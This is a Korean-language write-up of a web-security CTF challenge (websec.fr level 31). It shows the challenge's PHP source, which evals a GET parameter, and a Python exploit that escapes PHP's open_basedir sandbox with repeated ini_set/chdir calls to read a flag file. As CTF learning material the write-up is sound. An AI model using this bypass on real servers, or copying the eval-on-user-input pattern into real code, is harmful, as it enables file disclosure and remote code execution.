websec.fr medium level 31
source.php
<?php
ini_set('open_basedir', '/sandbox');
chdir('/sandbox');
ini_set('display_errors', 'on');
ini_set('error_reporting', E_ALL);
if (isset ($_GET['c'])) {
die (eval ($_GET['c']));
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<title>#WebSec Level Thirty-one</title>
<link rel="stylesheet" href="../static/bootstrap.min.css" />
</head>
<body>
<div id="main">
<div class="container">
<div class="row">
<h1>Level Thirty-one <small>- Since web browsers have sandboxes, why not php too?</small></h1>
</div>
<div class="row">
<p class="lead">
Can you read the <code>./flag.php</code> file?
You can take a look at the the source code <a href="source.php">here</a>.
</p>
</div>
</div>
<div class="container">
<div class="row">
<form action="" method="get" class="form-inline">
<label class="sr-only" for="c">Your text to store.</label>
<input type="text" id="c" class='form-control' name="c" size=96 placeholder="Your command.">
<button type="submit" value="Submit" name="submit" class="btn btn-default">execute</button>
</form>
</div>
</div>
</div>
</body>
</html>
대놓고 open_basedir bypass해보라고 코드짜논걸 볼 수 있다. phpino()로 버전 확인해보면 7.2.9 버전으로 나름 최근 버전이라 올해 초에 돌았던 lastests open_basedir trick으로 bypass해주면 된다. 이 때 mkdir이 권한때문에 안먹히는데 sandbox 디렉토리에 기본적으로 tmp 디렉토리를 만들어놨길래 이거 사용했다.
exploit.py
import requests
def exploit(payload):
url = "https://websec.fr/level31/index.php"
params = {"c":payload,"submit":"Submit"}
result = requests.get(url,params=params).text
print result
payload = """
ini_set('open_basedir','/sandbox');
chdir('./tmp');
ini_set('open_basedir','..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
ini_set('open_basedir','/');
var_dump(file_get_contents('/flag.php'));
"""
exploit(payload)